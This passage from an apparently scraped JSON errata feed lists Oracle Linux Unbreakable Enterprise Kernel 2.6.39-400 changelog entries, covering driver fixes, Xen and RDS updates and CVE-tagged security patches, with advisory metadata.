13740515]\n[2.6.39-400.19.1]\n- IB/core: Allow device-specific per-port sysfs files (Ralph Campbell)\n- RDMA/cma: Pass QP type into rdma_create_id() (Sean Hefty)\n- IB: Rename RAW_ETY to RAW_ETHERTYPE (Aleksey Senin)\n- IB: Warning Resolution. (Ajaykumar Hotchandani)\n- mlx4_core: fix FMR flags in free MTT range (Saeed Mahameed)\n- mlx4_core/ib: sriov fmr bug fixes (Saeed Mahameed)\n- mlx4_core: Change bitmap allocator to work in round-robin fashion (Saeed\n Mahameed)\n- mlx4_vnic: move host admin vnics to closed state when closing the vnic.\n (Saeed Mahameed)\n- mlx4_ib: make sure to flush clean_wq while closing sriov device (Saeed\n Mahameed)\n- ib_sdp: fix deadlock when sdp_cma_handler is called while socket is being\n closed (Saeed Mahameed)\n- ib_sdp: add unhandled events to rdma_cm_event_str (Saeed Mahameed)\n- mlx4_core: use dev->sriov instead of hardcoed 127 vfs when initializing FMR\n MPT tables (Saeed Mahameed)\n- mlx4_vnic: print vnic keep alive info in mlx4_vnic_info (Saeed Mahameed)\n- rds: Congestion flag does not get cleared causing the connection to hang\n (Bang Nguyen) [Orabug: 16424692]\n- dm table: set flush capability based on underlying devices (Mike Snitzer)\n [Orabug: 16392584]\n- wake_up_process() should be never used to wakeup a TASK_STOPPED/TRACED task\n (Oleg Nesterov) [Orabug: 16405869] {CVE-2013-0871}\n- ptrace: ensure arch_ptrace/ptrace_request can never race with SIGKILL (Oleg\n Nesterov) [Orabug: 16405869] {CVE-2013-0871}\n- ptrace: introduce signal_wake_up_state() and ptrace_signal_wake_up() (Oleg\n Nesterov) [Orabug: 16405869] {CVE-2013-0871}\n- drm/i915: bounds check execbuffer relocation count (Kees Cook) [Orabug:\n 16482650] {CVE-2013-0913}\n- NLS: improve UTF8 -> UTF16 string conversion routine (Alan Stern) [Orabug:\n 16425571] {CVE-2013-1773}\n- ipmi: make kcs timeout parameters as module options (Pavel Bures) [Orabug:\n 16470881]\n- drm/i915/lvds: ditch ->prepare special case (Daniel Vetter) [Orabug:\n 14394113]\n- drm/i915: Leave LVDS registers unlocked (Keith Packard) [Orabug: 14394113]\n- drm/i915: dont clobber the pipe param in sanitize_modesetting (Daniel\n Vetter) [Orabug: 14394113]\n- drm/i915: Sanitize BIOS debugging bits from PIPECONF (Chris Wilson) [Orabug:\n 14394113]\n[2.6.39-400.18.1]\n- SPEC: fix doc build (Guru Anbalagane)\n- floppy: Fix a crash during rmmod (Vivek Goyal) [Orabug: 16040504]\n- x86: ignore changes to paravirt_lazy_mode while in an interrupt context\n (Chuck Anderson) [Orabug: 16417326]\n- x86/msr: Add capabilities check (Alan Cox) [Orabug: 16405007] {CVE-2013-0268}\n- spec: unique debuginfo (Maxim Uvarov) [Orabug: 16245366]\n- xfs: Use preallocation for inodes with extsz hints (Dave Chinner) [Orabug:\n 16307993]\n- Add SIOCRDSGETTOS to get the current TOS for the socket (bang.nguyen)\n [Orabug: 16397197]\n- Changes to connect/TOS interface (bang.nguyen) [Orabug: 16397197]\n- floppy: Cleanup disk->queue before caling put_disk() if add_disk() was never\n called (Vivek Goyal) [Orabug: 16040504]", "edition": 4, "modified": "2013-04-11T00:00:00", "published": "2013-04-11T00:00:00", "id": "ELSA-2013-2513", "href": "http://linux.oracle.com/errata/ELSA-2013-2513.html", "title": "Unbreakable Enterprise kernel security and bugfix update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:57", "bulletinFamily": "unix", "cvelist": ["CVE-2012-2375", "CVE-2013-0228", "CVE-2013-0190", "CVE-2012-4461", "CVE-2012-4565", "CVE-2013-0217", "CVE-2013-0311", "CVE-2013-0231", "CVE-2012-5517", "CVE-2012-4398", "CVE-2013-0310", "CVE-2012-4530", "CVE-2013-0216", "CVE-2013-0309"], "description": " [2.6.39-400.17.1] \r\n- This is a fix on dlm_clean_master_list() (Xiaowei.Hu) \r\n- RDS: fix rds-ping spinlock recursion (jeff.liu) [Orabug: 16223050] \r\n- vhost: fix length for cross region descriptor (Michael S. Tsirkin) [Orabug: \r\n16387183] {CVE-2013-0311} \r\n- kabifix: block/scsi: Allow request and error handling timeouts to be \r\nspecified (Maxim Uvarov) \r\n- block/scsi: Allow request and error handling timeouts to be specified (Martin \r\nK. Petersen) [Orabug: 16372401] \r\n- [SCSI] Shorten the path length of scsi_cmd_to_driver() (Li Zhong) [Orabug: \r\n16372401] \r\n- Fix NULL dereferences in scsi_cmd_to_driver (Mark Rustad) [Orabug: 16372401] \r\n- SCSI: Fix error handling when no ULD is attached (Martin K. Petersen) \r\n[Orabug: 16372401] \r\n- Handle disk devices which can not process medium access commands (Martin K. \r\nPetersen) [Orabug: 16372401] \r\n- the ac->ac_allow_chain_relink=0 won't disable group relink (Xiaowei.Hu) \r\n[Orabug: 14842737] \r\n- pci: hotplug: fix null dereference in pci_set_payload() (Jerry Snitselaar) \r\n[Orabug: 16345420] \r\n \n[2.6.39-400.16.0] \r\n- epoll: prevent missed events on EPOLL_CTL_MOD (Eric Wong) [Orabug: 16363540] \r\n- rds: this resolved crash while removing rds_rdma module. orabug: 16268201 \r\n(Bang Nguyen) [Orabug: 16268201] \r\n- rds: scheduling while atomic on failover orabug: 16275095 (Bang Nguyen) \r\n[Orabug: 16268201] \r\n- SRP: Revert back to 2.6.39-400.8.0 code (Ajaykumar Hotchandani) [Orabug: \r\n16268201] \r\n- iSER: Revert back to 2.6.39-400.8.0 code (Ajaykumar Hotchandani) [Orabug: \r\n16268201] \r\n \n[2.6.39-400.15.0] \r\n- x86/xen: don't assume %ds is usable in xen_iret for 32-bit PVOPS. (Jan \r\nBeulich) {CVE-2013-0228} \r\n- xen-blkfront: drop the use of llist_for_each_entry_safe (Konrad Rzeszutek \r\nWilk) [Orabug: 16263164] \r\n- Revert 'xen PVonHVM: use E820_Reserved area for shared_info' (Konrad \r\nRzeszutek Wilk) [Orabug: 16297716] \r\n- Revert 'xen/PVonHVM: fix compile warning in init_hvm_pv_info' (Konrad \r\nRzeszutek Wilk) \r\n \n[2.6.39-400.14.0] \r\n- xfs: use shared ilock mode for direct IO writes by default (Dave Chinner) \r\n[Orabug: 16304938] \r\n- sched: fix divide by zero at {thread_group,task}_times (Stanislaw Gruszka) \r\n[Orabug: 15956690] \r\n- Revert 'Revert 'cgroup: notify_on_release may not be triggered in some \r\ncases'' (Maxim Uvarov) \r\n- xen_fmr: Verify XEN platform before running xen_fmr drivers (Yuval Shaia) \r\n[Orabug: 16302435] \r\n- rds: unregister IB event handler on shutdown (Bang Nguyen) [Orabug: 16302435] \r\n- rds: HAIP support child interface (Bang Nguyen) [Orabug: 16302435] \r\n- RDS HAIP misc fixes (Bang Nguyen) [Orabug: 16302435] \r\n- Ignore failover groups if HAIP is disabled (Bang Nguyen) [Orabug: 16302435] \r\n- RDS: RDS rolling upgrade (Saeed Mahameed) [Orabug: 16302435] \r\n- mlx4_core: use correct FMR number of clients according to PRM. (Saeed \r\nMahameed) [Orabug: 16302435] \r\n \n[2.6.39-400.13.0] \r\n- kmod: make __request_module() killable (Oleg Nesterov) [Orabug: 16286305] \r\n{CVE-2012-4398} \r\n- kmod: introduce call_modprobe() helper (Oleg Nesterov) [Orabug: 16286305] \r\n{CVE-2012-4398} \r\n- usermodehelper: implement UMH_KILLABLE (Oleg Nesterov) [Orabug: 16286305] \r\n{CVE-2012-4398} \r\n- usermodehelper: introduce umh_complete(sub_info) (Oleg Nesterov) [Orabug: \r\n16286305] {CVE-2012-4398} \r\n- KVM: x86: invalid opcode oops on SET_SREGS with OSXSAVE bit set \r\n(CVE-2012-4461) (Jerry Snitselaar) [Orabug: 16286290] {CVE-2012-4461} \r\n- exec: do not leave bprm->interp on stack (Kees Cook) [Orabug: 16286267] \r\n{CVE-2012-4530} \r\n- exec: use -ELOOP for max recursion depth (Kees Cook) [Orabug: 16286267] \r\n{CVE-2012-4530} \r\n- xen-pciback: rate limit error messages from xen_pcibk_enable_msi{,x}() (Jan \r\nBeulich) [Orabug: 16243736] {CVE-2013-0231} \r\n- netback: correct netbk_tx_err to handle wrap around. (Ian Campbell) [Orabug: \r\n16243309] {CVE-2013-0216 CVE-2013-0217} \r\n- xen/netback: free already allocated memory on failure in \r\nxen_netbk_get_requests (Ian Campbell) [Orabug: 16243309] {CVE-2013-0216 \r\nCVE-2013-0217} \r\n- xen/netback: don't leak pages on failure in xen_netbk_tx_check_gop. (Ian \r\nCampbell) [Orabug: 16243309] {CVE-2013-0216 CVE-2013-0217} \r\n- xen/netback: shutdown the ring if it contains garbage. (Ian Campbell) \r\n[Orabug: 16243309] {CVE-2013-0216 CVE-2013-0217} \r\n- SCSI: scsi_remove_target: fix softlockup regression on hot remove (Dan \r\nWilliams) [Orabug: 16242926] \r\n \n[2.6.39-400.12.0] \r\n- IB: Add config options for Mellanox driver Xen FMR support. (Ajaykumar \r\nHotchandani) [Orabug: 16234102] \r\n- IB: Enable Xen FMR support for Mellanox driver. (Ajaykumar Hotchandani) \r\n[Orabug: 16234102] \r\n \n[2.6.39-400.11.0] \r\n- cnic: don't use weak dependencies for ipv6 (Jerry Snitselaar) [Orabug: \r\n16207564] \r\n- ext4: remove unaligned AIO warning printk (Eric Sandeen) [Orabug: 14096480] \r\n- SPEC: add block/net modules to list used by installer (Guru Anbalagane) \r\n[Orabug: 14224837] \r\n- dm mpath: add retain_attached_hw_handler feature (Mike Snitzer) [Orabug: \r\n16199397] \r\n- [SCSI] scsi_dh: add scsi_dh_attached_handler_name (Mike Snitzer) [Orabug: \r\n16199397] \r\n- xen/grant-table: Force to use v1 of grants. (Konrad Rzeszutek Wilk) [Oracle- \r\nbug: 16039922] \r\n- xen: netback: handle compound page fragments on transmit. (Ian Campbell) \r\n- xen: Fix stack corruption in xen_failsafe_callback for 32bit PVOPS guests. \r\n(Andrew Cooper) {CVE-2013-0190} \r\n- xen/grant-table: correctly initialize grant table version 1 (Matt Wilson) \r\n \n[2.6.39-400.10.0] \r\n- btrfs: fix incompatible pointer warning (Jerry Snitselaar) \r\n- bnx2x: enable support for ethtool op get_rxfh_indir_size (Jerry Snitselaar) \r\n- Revert 'cgroup: notify_on_release may not be triggered in some cases' (Maxim \r\nUvarov) [Orabug: 16167473] \r\n- mlx4: disable build for i686 (Maxim Uvarov) \r\n \n[2.6.39-400.9.0] \r\n- mlx4_ib: alias_GUID, calculate slave port state in sa query handler \r\n(Ajaykumar Hotchandani) [Orabug: 15997083] \r\n- RDS: Fixes warning while rds-info. spin_lock_irqsave() is changed to \r\nspin_lock_bh(). (Ajaykumar Hotchandani) [Orabug: 15997083] \r\n- mlx4_en: handle HCA events correctly (Ajaykumar Hotchandani) [Orabug: \r\n15997083] \r\n- ixgbevf fix typo in Makefile (Maxim Uvarov) [Orabug: 16168292] \r\n- [patch3/3] kernel config: Mellanox OFED R2, 0080 release (Ajaykumar \r\nHotchandani) [Orabug: 15997083] \r\n- [patch2/3] RDS merge for UEK2 (Ajaykumar Hotchandani) [Orabug: 15997083] \r\n- [patch1/3] Merge for Mellanox OFED R2, 0080 release (Ajaykumar Hotchandani) \r\n[Orabug: 15997083] \r\n \n[2.6.39-400.8.0] \r\n- git-changelog: don't print debug info (Maxim Uvarov) \r\n- spec: remove not used firmwares (Maxim Uvarov) [Orabug: 16048277] \r\n \n[2.6.39-400.7.0] \r\n- git-changelog: search for bug # in merge commit (Maxim Uvarov) \r\n- be2iscsi: Bump the driver version (Jayamohan Kallickal) [Orabug: 16023790] \r\n- be2iscsi: Fix Unrecoverable Error Detection (Jayamohan Kallickal) [Orabug: \r\n16023790] \r\n- be2iscsi: Fix for MBX timeout issue (Jayamohan Kallickal) [Orabug: 16023790] \r\n- be2iscsi: Fix the copyright information (Jayamohan Kallickal) [Orabug: \r\n16023790] \r\n- be2iscsi: Fix issue of displaying adapter family. (Jayamohan Kallickal) \r\n[Orabug: 16023790] \r\n- be2iscsi: Fix Task Completion Event handling (Jayamohan Kallickal) [Orabug: \r\n16023790] \r\n- be2iscsi: Fix session update context with V2 version. (Jayamohan Kallickal) \r\n[Orabug: 16023790] \r\n- be2iscsi: Fix support for V2 version of WRB. (Jayamohan Kallickal) [Orabug: \r\n16023790] \r\n- be2iscsi: Fix support for handling CQ_CREATE V2 version. (Jayamohan \r\nKallickal) [Orabug: 16023790] \r\n- be2iscsi: Fix max EQ supported by the driver. (Jayamohan Kallickal) [Orabug: \r\n16023790] \r\n- be2iscsi: Fix driver support for an adapter. (Jayamohan Kallickal) [Orabug: \r\n16023790] \r\n- be2iscsi: Fix return value and typo. (Jayamohan Kallickal) [Orabug: 16023790] \r\n- be2iscsi: Fix kernel panic in blk_iopoll disable mode. (Jayamohan Kallickal) \r\n[Orabug: 16023790] \r\n- be2iscsi: Issue an FLR when driver is loaded (Jayamohan Kallickal) [Orabug: \r\n16023790] \r\n- be2iscsi: Display driver name and version in device attribute (Jayamohan \r\nKallickal) [Orabug: 16023790] \r\n- be2iscsi: Fix max supported EQ count to 8. (Jayamohan Kallickal) [Orabug: \r\n16023790] \r\n- be2iscsi: Fix memory leak in control path of driver (Jayamohan Kallickal) \r\n[Orabug: 16023790] \r\n- be2iscsi: Display Completion Event string instead of Opcode (Jayamohan \r\nKallickal) [Orabug: 16023790] \r\n- be2iscsi: Fix the issue with soft reset. (Jayamohan Kallickal) [Orabug: \r\n16023790] \r\n- netxen: update to qlogic 4.0.80 (Sritej Velaga) [Orabug: 16025025] \r\n- qlge: update to qlogic 1.00.00.31 (Sritej Velaga) [Orabug: 16025042] \r\n- qlcnic: Update to 5.1.27.35 (Sritej Velaga) [Orabug: 16024990] \r\n- [SCSI] scsi_dh_alua: Add fusionio ION LUNs to scsi_dh_alua device list (Mike \r\nChristie) [Orabug: 16081231] \r\n- bonding: fixup typo in rlb mode of bond and bridge fix (Guru Anbalagane) \r\n[Orabug: 16069448] \r\n- qla4xxx: Updated driver version to 5.03.00.01.06.02-uek2 (Tej Parkash) \r\n[Orabug: 16067337] \r\n- qla4xxx: Correct the validation to check in get_sys_info mailbox (Nilesh \r\nJavali) [Orabug: 16067337] \r\n- qla4xxx: Pass correct function param to qla4_8xxx_rd_direct (Vikas Chaudhary) \r\n[Orabug: 16067337] \r\n- qla4xxx: Fix memory corruption issue in qla4xxx_get_ep_fwdb. (Manish \r\nRangankar) [Orabug: 16067337] \r\n- qla4xxx: Allow reset in link down case (Harish Zunjarrao) [Orabug: 16067337] \r\n- qla4xxx: Fix MBOX intr switching from polling to intr mode for ISP83XX (Vikas \r\nChaudhary) [Orabug: 16067337] \r\n- [SCSI] hpsa: change confusing message to be more clear (Mike Miller) [Orabug: \r\n14793661] \r\n- [SCSI] hpsa: retry commands completing with status of UNSOLICITED_ABORT \r\n(Stephen M. Cameron) [Orabug: 14793661] \r\n- [SCSI] hpsa: use ioremap_nocache instead of ioremap (Stephen M. Cameron) \r\n[Orabug: 14793661] \r\n- [SCSI] hpsa: fix incorrect abort diagnostic message (Stephen M. Cameron) \r\n[Orabug: 14793661] \r\n- [SCSI] hpsa: dial down lockup detection during firmware flash (Stephen M. \r\nCameron) [Orabug: 14793661] \r\n- [SCSI] hpsa: add new RAID level '1(ADM)' (Mike Miller) [Orabug: 14793661] \r\n- [SCSI] hpsa: factor out hpsa_free_irqs_and_disable_msix (Stephen M. Cameron) \r\n[Orabug: 14793661] \r\n- [SCSI] hpsa: refine interrupt handler locking for greater concurrency (Matt \r\nGates) [Orabug: 14793661] \r\n- [SCSI] hpsa: use multiple reply queues (Matt Gates) [Orabug: 14793661] \r\n- [SCSI] hpsa: factor out tail calls to next_command() in \r\nprocess_(non)indexed_cmd() (Stephen M. Cameron) [Orabug: 14793661] \r\n- [SCSI] hpsa: do aborts two ways (Stephen M. Cameron) [Orabug: 14793661] \r\n- [SCSI] hpsa: add abort error handler function (Stephen M. Cameron) [Orabug: \r\n14793661] \r\n- [SCSI] hpsa: remove unused parameter from finish_cmd (Stephen M. Cameron) \r\n[Orabug: 14793661] \r\n- [SCSI] hpsa: do not give up retry of driver cmds after only 3 retries \r\n(Stephen M. Cameron) [Orabug: 14793661] \r\n- [SCSI] hpsa: retry driver initiated commands on busy status (Matt Bondurant) \r\n[Orabug: 14793661] \r\n- [SCSI] hpsa: suppress excessively chatty error messages (Stephen M. Cameron) \r\n[Orabug: 14793661] \r\n- [SCSI] hpsa: enable bus master bit after pci_enable_device (Stephen M. \r\nCameron) [Orabug: 14793661] \r\n- [SCSI] hpsa: do not skip disabled devices (Stephen M. Cameron) [Orabug: \r\n14793661] \r\n- [SCSI] hpsa: call pci_disable_device on driver unload (Stephen M. Cameron) \r\n[Orabug: 14793661] \r\n- [SCSI] hpsa: factor out driver name (Stephen M. Cameron) [Orabug: 14793661] \r\n- [SCSI] hpsa: gen8plus Smart Array IDs (Mike Miller) [Orabug: 14793661] \r\n \n[2.6.39-400.6.0] \r\n- qla3xxx: Ensure request/response queue addr writes to the registers (Joe Jin) \r\n[Orabug: 14614290] \r\n- tcp: fix tcp_trim_head() (Eric Dumazet) [Orabug: 14810429] \r\n- mm/hotplug: correctly add new zone to all other nodes' zone lists (Jiang Liu) \r\n[Orabug: 16020976 Bug-db: 14798] {CVE-2012-5517} \r\n- Divide by zero in TCP congestion control Algorithm. (Jesper Dangaard Brouer) \r\n[Orabug: 16020656 Bug-db: 14798] {CVE-2012-4565} \r\n- Fix length of buffer copied in __nfs4_get_acl_uncached (Sachin Prabhu) [Bug- \r\ndb: 14798] {CVE-2012-2375} \r\n- Avoid reading past buffer when calling GETACL (Sachin Prabhu) [Bug-db: 14798] \r\n{CVE-2012-2375} \r\n- Avoid beyond bounds copy while caching ACL (Sachin Prabhu) [Bug-db: 14798] \r\n{CVE-2012-2375} \r\n- Merge tag 'v2.6.39-400#bug16011154' of git://ca-git.us.oracle.com/linux- \r\nsnits-public (Maxim Uvarov) [Orabug: 16011154] \r\n- qla2xxx: Update the driver version to 8.04.00.11.39.0-k. (Saurav Kashyap) \r\n- qla2xxx: Obtain loopback iteration count from bsg request. (Joe Carnuccio) \r\n- qla2xxx: Update the FTP site references in the driver sources. (Giridhar \r\nMalavali) \r\n- qla2xxx: Debug ID corrections. (Chad Dupuis) \r\n- qla2xxx: Reject loopback request if one is already in progress. (Chad Dupuis) \r\n- qla2xxx: Print ignore message when thermal is not supported. (Joe Carnuccio) \r\n- qla2xxx: Avoid null pointer dereference in shutdown routine. (Masanari Iida) \r\n- qla2xxx: Get VPD information from common location for CNA. (Saurav Kashyap) \r\n- qla2xxx: Correct race in loop_state assignment during reset handling. (Andrew \r\nVasquez) \r\n- qla2xxx: Display that driver is operating in legacy interrupt mode. (Saurav \r\nKashyap) \r\n- qla2xxx: Free rsp_data even on error in qla2x00_process_loopback(). (Steve \r\nHodgson) \r\n- qla2xxx: Dont clear drv active on iospace config failure. (Saurav Kashyap) \r\n- qla2xxx: Fix typo in qla2xxx driver. (Masanari Iida) \r\n- qla2xxx: Update ql2xextended_error_logging parameter description with new \r\noption. (Chad Dupuis) \r\n- qla2xxx: Parameterize the link speed string conversion function. (Joe \r\nCarnuccio) \r\n- qla2xxx: Add 16Gb/s case to get port speed capability. (Joe Carnuccio) \r\n- qla2xxx: Move marking fcport online ahead of setting iiDMA speed. (Joe \r\nCarnuccio) \r\n- Merge tag 'v2.6.39-400.5.0#bugdb13826' of ca-git.us.oracle.com:linux-muvarov- \r\npublic (Maxim Uvarov) [Bug-db: 13826] \r\n- be2net: fix INTx ISR for interrupt behaviour on BE2 (Sathya Perla) \r\n- be2net: fix a possible events_get() race on BE2 (Sathya Perla) \r\n- net: Remove bogus dependencies on INET (Ben Hutchings) \r\n- be2net: remove adapter->eq_next_idx (Sathya Perla) \r\n- be2net: remove roce on lancer (Sathya Perla) \r\n- be2net: fix access to SEMAPHORE reg (Sathya Perla) \r\n- be2net: re-factor bar mapping code (Sathya Perla) \r\n- be2net: do not use sli_family to identify skyhawk-R chip (Sathya Perla) \r\n- be2net: fix wrong usage of adapter->generation (Sathya Perla) \r\n- be2net: remove LANCER A0 workaround (Sathya Perla) \r\n- be2net: Fix smatch warnings in be_main.c (Padmanabh Ratnakar) \r\n- be2net: Update driver version (Padmanabh Ratnakar) \r\n- be2net: Fix skyhawk VF PCI Device ID (Padmanabh Ratnakar) \r\n- be2net: Fix FW flashing on Skyhawk-R (Padmanabh Ratnakar) \r\n- be2net: Enabling Wake-on-LAN is not supported in S5 state (Padmanabh \r\nRatnakar) \r\n- be2net: Fix VF driver load on newer Lancer FW (Padmanabh Ratnakar) \r\n- be2net: Fix unnecessary delay in PCI EEH (Padmanabh Ratnakar) \r\n- be2net: Fix issues in error recovery due to wrong queue state (Padmanabh \r\nRatnakar) \r\n- be2net: Fix ethtool get_settings output for VF (Padmanabh Ratnakar) \r\n- be2net: Fix error messages while driver load for VFs (Padmanabh Ratnakar) \r\n- be2net: Fix configuring VLAN for VF for Lancer (Padmanabh Ratnakar) \r\n- be2net: Wait till resources are available for VF in error recovery (Padmanabh \r\nRatnakar) \r\n- be2net: Fix change MAC operation for VF for Lancer (Padmanabh Ratnakar) \r\n- be2net: Fix setting QoS for VF for Lancer (Padmanabh Ratnakar) \r\n- be2net: Fix driver load failure for different FW configs in Lancer (Padmanabh \r\nRatnakar) \r\n- be2net: create RSS rings even in multi-channel configs (Sathya Perla) \r\n- be2net: set maximal number of default RSS queues (Yuval Mintz) \r\n- be2net: Program secondary UC MAC address into MAC filter (Ajit Khaparde) \r\n- be2net: Remove code that stops further access to BE NIC based on UE bits \r\n(Ajit Khaparde) \r\n- be2net: fix vfs enumeration (Ivan Vecera) \r\n- be2net: fixup log messages (Sathya Perla) \r\n- be2net: cleanup code related to be_link_status_query() (Sathya Perla) \r\n- be2net: fix wrong handling of be_setup() failure in be_probe() (Sathya Perla) \r\n- be2net: remove type argument of be_cmd_mac_addr_query() (Sathya Perla) \r\n- Revert 'be2net: fix vfs enumeration' (David S. Miller) \r\n- be2net: fix vfs enumeration (Ivan Vecera) \r\n- be2net: use PCIe AER capability (Sathya Perla) \r\n- be2net: modify log msg for lack of privilege error (Vasundhara Volam) \r\n- be2net: fix FW default for VF tx-rate (Vasundhara Volam) \r\n- be2net: fix max VFs reported by HW (Vasundhara Volam) \r\n- netpoll: revert 6bdb7fe3104 and fix be_poll() instead (Amerigo Wang) \r\n- SPEC: OL5 kernel firmware rpm depends on all others firmwares (Maxim Uvarov) \r\n[Orabug: 15987332] \r\n \n[2.6.39-400.5.0] \r\n- x86, tsc: Fix SMI induced variation in quick_pit_calibrate() (Linus Torvalds) \r\n[Orabug: 13256166] \r\n- x86, tsc: Skip TSC synchronization checks for tsc=reliable (Suresh Siddha) \r\n[Orabug: 13256166] \r\n- bonding: rlb mode of bond should not alter ARP originating via bridge \r\n(zheng.li) [Orabug: 14650975] \r\n- Merge tag 'v2.6.39-400#rdac' of git://ca-git.us.oracle.com/linux-snits-public \r\n(Maxim Uvarov) \r\n- [SCSI] scsi_dh_rdac: Fix error path (Richard Weinberger) \r\n- [SCSI] scsi_dh_rdac: Adding NetApp as a brand name for rdac (Chauhan, Vijay) \r\n- Merge tag 'uek2-merge-400-3.8-fixes-tag' of git://ca-git.us.oracle.com/linux- \r\nkonrad-public (Maxim Uvarov) \r\n- xen-blkfront: handle bvecs with partial data (Roger Pau Monne) \r\n- xen-blkfront: implement safe version of llist_for_each_entry (Roger Pau \r\nMonne) \r\n- xen-blkback: implement safe iterator for the list of persistent grants (Roger \r\nPau Monne) \r\n- Merge tag 'uek2-merge-400-3.8-tag' of git://ca-git.us.oracle.com/linux- \r\nkonrad-public (Maxim Uvarov) \r\n- Merge tag 'uek2-merge-backport-3.8' of git://ca-git/linux-konrad-public into \r\nuek2-merge-400 (Konrad Rzeszutek Wilk) \r\n- xen: arm: implement remap interfaces needed for privcmd mappings. (Ian \r\nCampbell) \r\n- xen: correctly use xen_pfn_t in remap_domain_mfn_range. (Ian Campbell) \r\n- xen: arm: enable balloon driver (Ian Campbell) \r\n- xen: balloon: allow PVMMU interfaces to be compiled out (Ian Campbell) \r\n- xen: privcmd: support autotranslated physmap guests. (Mukesh Rathor) \r\n- xen: add pages parameter to xen_remap_domain_mfn_range (Ian Campbell) \r\n- xen/PVonHVM: fix compile warning in init_hvm_pv_info (Olaf Hering) \r\n- xen/acpi: Move the xen_running_on_version_or_later function. (Konrad \r\nRzeszutek Wilk) \r\n- xen/xenbus: Remove duplicate inclusion of asm/xen/hypervisor.h (Sachin Kamat) \r\n- xen/acpi: Fix compile error by missing decleration for xen_domain. (Konrad \r\nRzeszutek Wilk) \r\n- xen/acpi: revert pad config check in xen_check_mwait (Liu, Jinsong) \r\n- xen/acpi: ACPI PAD driver (Liu, Jinsong) \r\n- xen PVonHVM: use E820_Reserved area for shared_info (Olaf Hering) \r\n- xen-blkfront: free allocated page (Roger Pau Monne) \r\n- xen-blkback: move free persistent grants code (Roger Pau Monne) \r\n- xen/blkback: persistent-grants fixes (Roger Pau Monne) \r\n- xen/blkback: Persistent grant maps for xen blk drivers (Roger Pau Monne) \r\n- xen/blkback: Change xen_vbd's flush_support and discard_secure to have type \r\nunsigned int, rather than bool (Oliver Chick) \r\n- xen/blkback: use kmem_cache_zalloc instead of kmem_cache_alloc/memset (Wei \r\nYongjun) \r\n- xen/blkfront: Add WARN to deal with misbehaving backends. (Konrad Rzeszutek \r\nWilk) \r\n- llist-return-whether-list-is-empty-before-adding-in-llist_add-fix (Andrew \r\nMorton) \r\n- llist: Add back llist_add_batch() and llist_del_first() prototypes (Stephen \r\nRothwell) \r\n- llist: Remove cpu_relax() usage in cmpxchg loops (Peter Zijlstra) \r\n- llist: Add llist_next() (Peter Zijlstra) \r\n- llist: Return whether list is empty before adding in llist_add() (Huang Ying) \r\n- llist: Move cpu_relax() to after the cmpxchg() (Huang Ying) \r\n- llist: Remove the platform-dependent NMI checks (Ingo Molnar) \r\n- llist: Make some llist functions inline (Huang Ying) \r\n- lib, Add lock-less NULL terminated single list (Huang Ying) \r\n- xen/oprofile: Expose the oprofile_arch_exit_fnc pointer. (Konrad Rzeszutek \r\nWilk) \r\n- xen/oprofile: Switch from syscore_ops to platform_ops. (Konrad Rzeszutek \r\nWilk) \r\n- xen/oprofile: Fix compile issues when CONFIG_XEN is not defined. (Konrad \r\nRzeszutek Wilk) \r\n- xen/oprofile: The arch_ variants for init/exec weren't being called. (Konrad \r\nRzeszutek Wilk) \r\n- xen/oprofile: Compile fix (Konrad Rzeszutek Wilk) \r\n- xen/oprofile: Patch from Michael Petullo (Konrad Rzeszutek Wilk) \r\n \n[2.6.39-400.4.0] \r\n- Merge tag 'uek2-merge-400-3.7-tag' of git://ca-git.us.oracle.com/linux- \r\nkonrad-public (Maxim Uvarov) \r\n- Merge tag 'uek2-merge-backport-3.7' of git://ca-git/linux-konrad-public into \r\nuek2-merge-400 (Konrad Rzeszutek Wilk) \r\n- Revert 'xen/x86: Workaround 64-bit hypervisor and 32-bit initial domain.' and \r\n'xen/x86: Use memblock_reserve for sensitive areas.' (Konrad Rzeszutek Wilk) \r\n- xen/x86: Workaround 64-bit hypervisor and 32-bit initial domain. (Konrad \r\nRzeszutek Wilk) \r\n- xen/arm: Fix compile errors when drivers are compiled as modules (export \r\nmore). (Stefano Stabellini) \r\n- xen/arm: Fix compile errors when drivers are compiled as modules. (Konrad \r\nRzeszutek Wilk) \r\n- xen/generic: Disable fallback build on ARM. (Konrad Rzeszutek Wilk) \r\n- xen/hvm: If we fail to fetch an HVM parameter print out which flag it is. \r\n(Konrad Rzeszutek Wilk) \r\n- xen/hypercall: fix hypercall fallback code for very old hypervisors (Jan \r\nBeulich) \r\n- xen/arm: use the __HVC macro (Stefano Stabellini) \r\n- xen/xenbus: fix overflow check in xenbus_file_write() (Jan Beulich) \r\n- xen-kbdfront: handle backend CLOSED without CLOSING (David Vrabel) \r\n- xen-fbfront: handle backend CLOSED without CLOSING (David Vrabel) \r\n- xen/gntdev: don't leak memory from IOCTL_GNTDEV_MAP_GRANT_REF (David Vrabel) \r\n- x86: remove obsolete comment from asm/xen/hypervisor.h (Olaf Hering) \r\n- xen: dbgp: Fix warning when CONFIG_PCI is not enabled. (Ian Campbell) \r\n- USB EHCI/Xen: propagate controller reset information to hypervisor (Jan \r\nBeulich) \r\n- xen: arm: comment on why 64-bit xen_pfn_t is safe even on 32 bit (Ian \r\nCampbell) \r\n- xen: balloon: use correct type for frame_list (Ian Campbell) \r\n- xen/x86: don't corrupt %eip when returning from a signal handler (David \r\nVrabel) \r\n- xen: arm: make p2m operations NOPs (Ian Campbell) \r\n- xen: balloon: don't include e820.h (Ian Campbell) \r\n- xen: events: pirq_check_eoi_map is X86 specific (Ian Campbell) \r\n- xen: XENMEM_translate_gpfn_list was remove ages ago and is unused. (Ian \r\nCampbell) \r\n- xen: sysfs: include err.h for PTR_ERR etc (Ian Campbell) \r\n- xen: xenbus: quirk uses x86 specific cpuid (Ian Campbell) \r\n- xen/xenbus: Fix compile warning. (Konrad Rzeszutek Wilk) \r\n- xen/x86: remove duplicated include from enlighten.c (Wei Yongjun) \r\n- xen/pv-on-hvm kexec: add quirk for Xen 3.4 and shutdown watches. (Konrad \r\nRzeszutek Wilk) \r\n- xen/bootup: allow {read|write}_cr8 pvops call. (Konrad Rzeszutek Wilk) \r\n- xen/bootup: allow read_tscp call for Xen PV guests. (Konrad Rzeszutek Wilk) \r\n- xen pv-on-hvm: add pfn_is_ram helper for kdump (Olaf Hering) \r\n- xen/hvc: handle backend CLOSED without CLOSING (David Vrabel) \r\n- xen/xen_initial_domain: check that xen_start_info is initialized (Stefano \r\nStabellini) \r\n- xen: mark xen_init_IRQ __init (Stefano Stabellini) 